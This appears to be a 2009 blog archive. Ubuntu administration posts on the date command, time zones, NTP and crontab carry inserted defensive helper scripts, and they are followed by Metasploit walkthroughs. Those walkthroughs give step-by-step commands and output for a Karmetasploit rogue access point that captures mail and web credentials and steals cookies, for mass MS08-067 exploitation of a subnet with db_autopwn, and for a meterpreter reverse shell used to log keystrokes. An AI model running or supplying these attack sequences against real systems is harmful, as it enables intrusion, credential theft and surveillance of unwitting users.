Thursday, July 23, 2009

Ghost ubuntu server

http://www.debianadmin.com/backup-and-restore-linux-partitions-using-partimage.html

http://www.psychocats.net/ubuntu/partimage

Wednesday, July 22, 2009

Manage Time in Ubuntu Through Command Line

View Time

To view the current date and time, the following command will be enough

date

Set Time

To change the time means to hand date a new value. To set the time on Ubuntu (or any Linux with GNU coreutils), run

sudo date newdatetimestring

where newdatetimestring has the form nnddhhmmyyyy.ss (GNU date documents it as MMDDhhmm[[CC]YY][.ss]), described below. Two things to keep in mind: date interprets the value in the local time zone unless you pass -u, and it sets only the kernel's clock; run sudo hwclock --systohc afterwards if the hardware clock should also carry the new value across a reboot.

  • nn is the two-digit month, 01 to 12
  • dd is the two-digit day, 01 to 31, with the usual rules for days per month and year applying
  • hh is the two-digit hour on the 24-hour clock, 00 to 23
  • mm is the two-digit minute, 00 to 59
  • yyyy is the year; it can be two or four digits, your choice. I prefer four-digit years whenever I can for clarity and less confusion
  • ss is the two-digit seconds. Notice the period '.' before ss; the whole .ss part is optional, and without it the seconds are set to 00

Say you want to set the clock to December 6, 2007, 22:43:55; then you would use:

sudo date 120622432007.55

A second example, this time without seconds:

sudo date 121710452006

sets December 17, 2006, 10:45:00: 12 is the month, 17 the day, 10 the hour, 45 the minute and 2006 the year, and with no .ss part the seconds become 00.
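Because the nnddhhmmyyyy.ss string is easy to get wrong, here is an added example (not part of the original post) that derives it from a readable ISO-8601 timestamp with GNU date and refuses to apply it when it would move the clock by more than a threshold: a clock that jumps by hours silently breaks certificate validity checks, Kerberos tickets and log timelines, and a drift that large is better corrected by NTP. The function names, the 300-second default limit and the SET_TIME_APPLY switch are this example's own conventions, and everything is computed in UTC so the conversion is deterministic.

```sh
#!/bin/sh
# Added example, not from the original post. Assumes GNU date (the -d option).

# iso_to_date_arg "YYYY-MM-DD HH:MM:SS" -> "MMDDhhmmYYYY.ss"; fails on unparseable input
iso_to_date_arg() {
    TZ=UTC date -d "$1" +%m%d%H%M%Y.%S 2>/dev/null
}

# clock_jump_seconds TIMESTAMP [NOW_EPOCH] -> absolute distance in seconds
# between the requested time and now (NOW_EPOCH overrides "now", used by the tests)
clock_jump_seconds() {
    target=$(TZ=UTC date -d "$1" +%s 2>/dev/null) || return 1
    now=${2:-$(date -u +%s)}
    diff=$((target - now))
    [ "$diff" -lt 0 ] && diff=$((0 - diff))
    echo "$diff"
}

# set_time_safely TIMESTAMP [MAX_JUMP_SECONDS]
# Prints the date command it would run and applies it only when SET_TIME_APPLY=1.
# Return codes: 0 ok, 2 bad timestamp, 3 refused because the jump is too large, 4 date failed.
set_time_safely() {
    ts=$1; max=${2:-300}
    arg=$(iso_to_date_arg "$ts") || { echo "invalid timestamp: $ts" >&2; return 2; }
    jump=$(clock_jump_seconds "$ts") || return 2
    if [ "$jump" -gt "$max" ]; then
        echo "refusing: would move the clock by ${jump}s (limit ${max}s); let NTP step it instead" >&2
        return 3
    fi
    printf 'date -u %s\n' "$arg"          # -u: the string was built in UTC, so set it as UTC
    if [ "${SET_TIME_APPLY:-0}" = 1 ]; then
        sudo date -u "$arg" >/dev/null || return 4
    fi
    return 0
}

# Usage (dry run):   set_time_safely "2007-12-06 22:43:55"
# Apply for real:    SET_TIME_APPLY=1 set_time_safely "$(date -u '+%Y-%m-%d %H:%M:%S')" 60
```

The dry run prints the exact `date -u 120622432007.55` command for the post's example, and the guard refuses it because it is years away from the current time; the intended workflow is to fix the clock with ntpdate or ntpd first and reserve manual setting for small corrections.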

Change Time Zone

On current Ubuntu releases the supported way to change the system time zone is

sudo dpkg-reconfigure tzdata

which walks you through the region and city menus and rewrites /etc/localtime and /etc/timezone. Older releases shipped

tzconfig

which did the same job interactively; you may also choose UTC (GMT) there if you want.

tzselect

is a different tool: it offers the same list of zones, but it only works out the matching TZ value and prints it, without changing the system zone, so it suits a single user's shell profile rather than the machine. If you would like UTC, choose the option which says something like 'none of the above' or 'none of these'. In my case it was option 11. It then asks for the difference from UTC as a POSIX TZ string; I chose GST-0 as the option and it set the time as UTC. In a string like GST-0 the letters are only a label for the zone and -0 is the offset, so any label with offset 0 gives UTC.

Sync Clock Via NTP

Keeping the clock synchronized with NTP servers is also easy. The configuration lives in /etc/ntp.conf, which is read at startup by the ntpd daemon from the ntp package (sudo apt-get install ntp); creating the file by itself does nothing unless ntpd is installed and running. To check whether the file exists:

ls /etc/ntp.conf

If ls prints /etc/ntp.conf, you already have the file. If it reports an error, create it yourself:

sudo vim /etc/ntp.conf

ntpd reads this file only when it starts, so restart it (sudo /etc/init.d/ntp restart) after editing.

Whether you had the file already or not, make sure it contains at least the following:

driftfile /var/lib/ntp/ntp.drift
server 0.pool.ntp.org
server 1.pool.ntp.org
server 2.pool.ntp.org
server pool.ntp.org

Here you may replace, add, and/or remove any servers you wish; the public NTP time server list has more. Two caveats. Plain NTP is unauthenticated UDP, so an on-path attacker can feed the machine wrong time and, with it, break certificate validity checks and log timelines; on a network you control, point at time servers you control. And a file with only server lines, like the one above, has no access policy at all: keep the restrict default ... nomodify noquery lines from the distribution's stock ntp.conf so that strangers cannot send control and monitoring queries to the daemon.

You may manually sync the clock using the following

sudo ntpdate servername

where servername can be any public or private time server, for example

sudo ntpdate pool.ntp.org

ntpdate steps the clock immediately, but it refuses to run while ntpd already holds UDP port 123 ("the NTP socket is in use"), so stop ntpd first, or use sudo ntpd -gq, which performs the same one-shot correction and exits.
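As an added example (not from the original post), here is a small audit that checks an ntp.conf for the things discussed above: time sources, a driftfile and a restrictive default access policy. It compares the post's minimal file with a version carrying the restrict lines that Ubuntu's stock ntp.conf ships. Both sample configurations are constructed inline for the example, and the checks assume the classic ntpd syntax.

```sh
#!/bin/sh
# Added example, not from the original post: audit an ntp.conf before trusting it.

# The post's minimal file: time sources, but no access policy at all (constructed sample).
WEAK_CONF='driftfile /var/lib/ntp/ntp.drift
server 0.pool.ntp.org
server 1.pool.ntp.org
server 2.pool.ntp.org
server pool.ntp.org'

# Same sources plus the restrict lines Ubuntu ships: serve time to anyone, but refuse
# control queries (noquery) and runtime reconfiguration (nomodify) (constructed sample).
HARDENED_CONF='driftfile /var/lib/ntp/ntp.drift
restrict -4 default kod notrap nomodify nopeer noquery
restrict -6 default kod notrap nomodify nopeer noquery
restrict 127.0.0.1
restrict ::1
server 0.pool.ntp.org iburst
server 1.pool.ntp.org iburst
server 2.pool.ntp.org iburst
server 3.pool.ntp.org iburst'

# audit_ntp_conf: reads an ntp.conf on stdin, prints OK/WARN/FAIL lines,
# exits 0 only when every check passes.
audit_ntp_conf() (
    set +e
    rc=0
    conf=$(sed -e 's/#.*//' -e '/^[[:space:]]*$/d')        # drop comments and blank lines

    servers=$(printf '%s\n' "$conf" | grep -Ec '^[[:space:]]*(server|pool)[[:space:]]')
    if [ "$servers" -gt 0 ]; then
        echo "OK: $servers time source(s)"
    else
        echo "FAIL: no server/pool lines, ntpd has nothing to synchronize to"; rc=1
    fi

    if printf '%s\n' "$conf" | grep -Eq '^[[:space:]]*driftfile[[:space:]]'; then
        echo "OK: driftfile set"
    else
        echo "WARN: no driftfile, the frequency error is relearned after every restart"; rc=1
    fi

    # "restrict default", "restrict -4 default" and "restrict -6 default" all count
    restrict=$(printf '%s\n' "$conf" | grep -E '^[[:space:]]*restrict[[:space:]]+(-[46][[:space:]]+)?default')
    if [ -z "$restrict" ]; then
        echo "FAIL: no 'restrict default' line, anyone may send control and monitoring queries"; rc=1
    else
        echo "OK: restrict default present"
        for flag in noquery nomodify; do
            # fail if any of the default lines is missing the flag
            if printf '%s\n' "$restrict" | grep -vq "$flag"; then
                echo "FAIL: a restrict default line lacks $flag"; rc=1
            fi
        done
    fi
    exit $rc
)

# Usage:  audit_ntp_conf < /etc/ntp.conf
#         printf '%s\n' "$WEAK_CONF" | audit_ntp_conf
```

Run against the post's file the audit reports the missing access policy and exits non-zero; against the hardened file every check passes. The noquery check is the one that matters on a server reachable from untrusted networks, since unrestricted ntpd monitoring queries were the classic amplification vector.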

Tuesday, July 21, 2009

An overview of crontab

1. What is cron?
Cron is a utility that runs tasks automatically on a schedule, in the background. A crontab (CRON TABle) is a file holding the schedule of entries to be run.

2. How does cron work?
A cron schedule is just a text file. Each user has their own, kept under /var/spool/cron (on Debian and Ubuntu, /var/spool/cron/crontabs). You do not create or edit these files directly with a text editor; go through the crontab command instead, which validates the file and installs it into the spool. Commonly used commands:

crontab -e: create or edit your crontab
crontab -l: display your crontab
crontab -r: delete your crontab

3. Structure of a crontab
Each line of a crontab has five fields that set the time, followed by the command to be run periodically:
Code:
 *     *     *     *     *     command to be executed
- - - - -
| | | | |
| | | | +----- day of week (0 - 6) (Sunday=0)
| | | +------- month (1 - 12)
| | +--------- day of month (1 - 31)
| +----------- hour (0 - 23)
+------------- min (0 - 59)

A * in a field means the task runs for every value of that field. Fields also accept lists (1,4), ranges (1-5) and steps (*/15). Note that cron runs the command with a minimal environment (PATH is normally just /usr/bin:/bin), so use absolute paths inside scripts.

4. Example
Suppose I write the following script to back up my Firefox bookmarks:
Code:
 #!/bin/bash
 # copy today's bookmarks file to the backup directory, named by date
 date=$(date +%F)

 cp ~/.mozilla/firefox/13kee53o.default/bookmarks.html "/mnt/data/BACKUP/bookmarks-$date.html"

Then I run it at 15:00 every Monday and Thursday by adding a crontab entry like this:
Code:
 $ export EDITOR=vi && crontab -e
 0 15 * * 1,4 sh /mnt/data/linux/code/backupbookmarks.sh

Note that running it as sh script executes it under sh regardless of the #!/bin/bash line; either invoke it with bash, or make it executable and give its path directly.

Restarting the cron daemon is not required, since cron notices crontabs installed through crontab -e by itself, but a restart does no harm:
Code:
/etc/init.d/cron restart

PS: To test right away whether the crontab works, change the script slightly so that every run produces a distinct file name:
Code:
 #!/bin/bash
 # same backup, but the file name carries the time down to the second
 date=$(date +%F-%H-%M-%S)

 cp ~/.mozilla/firefox/13kee53o.default/bookmarks.html "/mnt/data/BACKUP/bookmarks-$date.html"

and have the crontab back up every minute:
0-59 * * * * sh /mnt/data/linux/code/backupbookmarks.sh

(0-59 in the minute field means the same as *.) Remember to remove this entry once you have seen the backups appear.
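crontab -e rejects malformed entries at edit time, but crontabs generated by provisioning scripts or dropped into /etc/cron.d get no such check before cron reads them, and an invalid line there costs you the whole file. Here is an added example (not from the original post) that validates the five schedule fields of Vixie-style crontab lines as described above: *, lists, ranges and steps, with day-of-week 0-7 (7 is Sunday again). It handles numeric fields only; month and weekday names and @reboot-style shorthands are outside its scope. The sample crontab at the bottom is constructed for the example.

```sh
#!/bin/sh
# Added example, not from the original post: lint the schedule fields of a crontab.

# validate_cron_field VALUE MIN MAX -> exit 0 if VALUE is a valid field for MIN..MAX.
# Accepts *, N, A-B, lists of those separated by commas, and an optional /STEP suffix.
validate_cron_field() (
    set +e -f                       # -f: '*' must stay a literal, never a glob
    field=$1; lo=$2; hi=$3
    IFS=','
    for item in $field; do
        IFS=' '
        step=1
        case $item in */*) step=${item#*/}; item=${item%%/*} ;; esac
        case $step in ''|*[!0-9]*) exit 1 ;; esac
        [ "$step" -ge 1 ] || exit 1
        case $item in
            '*')  continue ;;
            *-*)  a=${item%-*}; b=${item#*-} ;;
            *)    a=$item; b=$item ;;
        esac
        case $a in ''|*[!0-9]*) exit 1 ;; esac
        case $b in ''|*[!0-9]*) exit 1 ;; esac
        [ "$a" -ge "$lo" ] && [ "$b" -le "$hi" ] && [ "$a" -le "$b" ] || exit 1
    done
    exit 0
)

# validate_cron_line "min hour dom mon dow command..." -> exit 0 if the five
# schedule fields are valid and a command follows them.
validate_cron_line() (
    set +e -f
    set -- $1                       # split on whitespace; $1..$5 are the schedule
    [ $# -ge 6 ] || exit 1
    validate_cron_field "$1" 0 59 &&
    validate_cron_field "$2" 0 23 &&
    validate_cron_field "$3" 1 31 &&
    validate_cron_field "$4" 1 12 &&
    validate_cron_field "$5" 0 7
)

# lint_crontab: read a crontab on stdin, report schedule lines that fail, exit 1 if any do.
# Comments, blank lines and VAR=value lines are skipped.
lint_crontab() (
    set +e
    bad=0; n=0
    while IFS= read -r line; do
        n=$((n + 1))
        case $line in ''|'#'*|[A-Za-z_]*=*) continue ;; esac
        validate_cron_line "$line" || { echo "line $n: invalid schedule: $line"; bad=$((bad + 1)); }
    done
    [ "$bad" -eq 0 ]
)

# Constructed sample: the post's two entries plus one that names a 24th hour.
SAMPLE_CRONTAB='# backup bookmarks
MAILTO=root
0 15 * * 1,4 sh /mnt/data/linux/code/backupbookmarks.sh
0-59 * * * * sh /mnt/data/linux/code/backupbookmarks.sh
0 24 * * * sh /mnt/data/linux/code/backupbookmarks.sh'

# Usage:  crontab -l | lint_crontab
#         printf '%s\n' "$SAMPLE_CRONTAB" | lint_crontab
```

On the sample, the two real entries pass and the third is reported as "line 5: invalid schedule"; feeding it `crontab -l` output or a file from /etc/cron.d works the same way, except that /etc/cron.d lines carry a user name after the schedule, which this linter simply treats as the start of the command.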

Friday, July 3, 2009

Metasploit + Karma=Karmetasploit

HD Moore released some documentation to get karmetasploit working with the framework.

First you'll have to get an updated version of aircrack-ng, because you'll need airbase-ng. I had 0.9.1, so I had to download and install the current stable version (1.0-rc1). If you have an old version you should be good dependency-wise. Ah, but there is a patch (I used the 2nd patch), so apply that before you make/make install.

You may also need a current version of the madwifi drivers (I used 0.9.4). I recently updated my kernel and that had hosed all my madwifi stuff up, so I had to reinstall. OK, so you've got an updated version of aircrack, patched airbase-ng, and madwifi drivers, and can inject packets? Let's continue.

Let's do our aireplay-ng test to see if things are working:

root@WPAD:/home/cg# aireplay-ng --test ath40
19:55:44 Trying broadcast probe requests...
19:55:44 Injection is working!
19:55:46 Found 5 APs

19:55:46 Trying directed probe requests...
19:55:46 00:1E:58:33:83:71 - channel: 4 - 'vegaslink'
19:55:52 0/30: 0%

19:55:52 00:14:06:11:42:A2 - channel: 4 - 'VEGAS.com'
19:55:58 0/30: 0%

19:55:58 00:13:19:5F:D1:D0 - channel: 6 - 'stayonline'
19:56:03 Ping (min/avg/max): 20.712ms/26.964ms/31.267ms Power: 14.80
19:56:03 5/30: 16%

19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'
19:56:09 0/30: 0%

19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%


Looks like we are good.

Now just follow the steps in the documentation: I installed dhcpd3 and set up my conf file, did an svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.

With all the config files set up it's pretty easy to get things going.

root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
----snip------
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet
**You get the idea...

airbase-ng creates a tap interface, at0, so you have to configure it and set the MTU size (all this is from the karmetasploit documentation):

root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0

root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400

root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800

After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on:

root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net


After that we run our karma.rc resource file with msfconsole:

root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc


=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux

resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 5353
SRVPORT => 5353
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 53
SRVPORT => 53
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >


OK, so we have everything up and running (first post) and we are waiting for some random person... err, your lab wifi box, to connect to Karmetasploit.

We take a look at our current network connection before airbase-ng starts doing its thing.

Note the blistering connection I had at the hotel.

Now we take a look at some of the available APs after airbase-ng starts doing its thing.

And lastly my computer connected to the hhonors AP.

After that we open up our browser and try to go to google.com and we get the portal page that karmetasploit presents.

But as soon as we click enter or try to browse to a different URL a whole bunch of iframes start doing their thing, trying to do the cookie theft and exploitation. You can see it in the bottom left corner.

Here we can see the result of ipconfig /all and see that my DHCP server and DNS server are from karmetasploit.

A shot of airbase-ng doing its thing.

iPhones connecting up.

Cookie theft.

POP password gathering.

I saw the SMB Relay attack attempted a couple of times but I didn't see any of the other client-side attacks being launched. Not sure what the issue is. I'm going to try it with a known vulnerable version of IE6 and see if I can get some better results. First instinct is that the browser enumeration code in browser_autopwn isn't working quite right and therefore isn't sending any client-sides out, but I could be wrong.

That's it for now.

Metasploit Mass Exploitation for Dummies

One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time.

In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.

To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.


msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3


Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:


msf > db_create
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db


To speed up our test, we will use the db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is the flag combination below (-sS SYN scan, -PS445 host discovery by SYN to 445 only, -n no DNS, -T Aggressive timing):


msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24


Finally, we execute the db_autopwn command, with the -e option to launch exploits, the -p option to match modules against the open ports recorded in the database, the -b option to select bind-shell payloads, and the -m option to only run modules whose name matches "ms08_067". Bind shells require the attacker to reach a new listening port on each target, so against hosts behind a host firewall the -r option (reverse-connect payloads) is usually the more reliable choice:


msf > db_autopwn -e -p -b -m ms08_067


Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.


msf > sessions -l
Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell AAA.BBB.CCC.11 -> AAA.BBB.CCC.86

msf > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


Enjoy!

Remote Keystroke Sniffing with Meterpreter

$ msfconsole

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139

msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability...
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]

meterpreter > migrate 316
[*] Migrating to 316...
[*] Migration completed successfully.

meterpreter > getpid
Current pid: 316

meterpreter > grabdesktop
Trying to hijack the input desktop...

meterpreter > keyscan_start
Starting the keystroke sniffer...

meterpreter > keyscan_dump
Dumping captured keystrokes...

This is a test of the keystroke logger I am typing this inside of notepad.

http://blog.metasploit.com/2009/03/remote-keystroke-sniffing-with.html